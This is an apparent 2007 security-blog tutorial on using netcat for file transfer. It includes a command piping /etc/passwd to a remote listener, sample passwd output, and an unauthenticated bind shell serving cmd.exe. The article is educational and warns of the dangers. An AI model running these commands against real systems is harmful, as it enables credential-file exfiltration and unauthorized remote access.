Open source software security

Using Netcat to Transfer Files (and Other Mischief)

30 November -0001
By: Justin C. Klein Keane
Nov. 19, 2007

Netcat is an oft maligned program that can easily be used for many interesting and useful purposes. While many admins have heard of netcat, it is usually in the context of detecting rootkits or evidence of intrusion. The fact that netcat is a favorite tool among malicious hackers does a great disservice to the tool, but it also demonstrates its utility.

Netcat is, as it name suggests, a program utilized to concatenate network traffic. Netcat listens to traffic on a port and redirects that traffic to output (either standard output or even to a file). At first this seems fairly trivial, but it is extremely useful for transferring files in absence of other utilities. Moving files to and from hosts without another transport program, such as FPT, SSH or windows filesharing is incredibly useful. Additionally, netcat is an unauthenticated protocol, so it duplicates much of the ease of use that makes TFTP (trivial file transfer protocol) attractive.

Netcat is available for both windows and *unix systems. The windows version is available from vulnwatch.org at http://www.vulnwatch.org/netcat/. The unix/linux version is available from SourceForge at http://netcat.sourceforge.net/ but is also available with most Linux distributions.

Netcat runs in two modes. The client can be used to pipe data off the filesystem out over a port and the listener (or server) can open a port and listen for incoming data. The two modes are distinct so you must understand how to use netcat before you get started. A simple example will probably serve to demonstrate the modes better.

For the purposes of our example let's say we wanted to 'export' the password file off of a remote Linux workstation. We have netcat installed on our local workstation and first we need to set up a listener to capture the incoming data. We start up netcat using the '-l' flag so that it is listening and the '-p' flag to specify what port we want. Netcat will remain up and listening until it receives an end of file (EOF) delimiter. We redirect the output of netcat to a file so that we can review the results later. Assuming the workstation is assigned the IP address 192.168.0.50 we use:

C:\netcat>nc -l -p 2222 > log.txt

To set up netcat listening on port 2222. Next we issue a similar command on the remote machine:

# cat /etc/passwd | nc 192.168.0.50 2222

This command reads the contents of the file /etc/passwd and redirects it to netcat. Netcat in turn sends the data to 192.168.0.50, port 2222. Returning to the local machine we see:

C:\netcat>type log.txt

C:\netcat>nc -l -p 2222 > log.txt

C:\netcat>type log.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
...

Another neat use of netcat is simply as a listener. This works well when you want to send information from a system that doesn't have netcat installed on it. For instance, if you were to set up a listener on one machine, you could send information to that machine using a generic network communications program, such as telnet.

Of course the most nefarious use of netcat is to spawn a reverse shell. To do this you basically set up netcat as a listener, redirecting all input to a program on the listening machine. If you set netcat to redirect input to cmd.exe on a Windows system you effectively have a remote shell. The scary thing about this is that netcat is completely unauthenticated. To start netcat in this way use:

C:\netcat>nc -l -p 2222 -e cmd.exe

And on a remote machine we can connect and type commands quite easily:

[root]# telnet 192.168.0.50 2222
Trying 192.168.0.50...
Connected to 192.168.0.10.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\netcat>date
date
The current date is: Mon 11/19/2007
Enter the new date: (mm-dd-yy)

This example definitively demonstrates the danger of allowing an unauthorized user running netcat.

Netcat on Windows consists of a single 60KB file that can easily be transferred even over the slowest connections. On a Fedora 7 Linux system the file is a mere 26KB. Given the versatility of this tool and the small footprint it is no wonder that it is often included with many exploits as a pathway to gain remote access to a system by many hackers.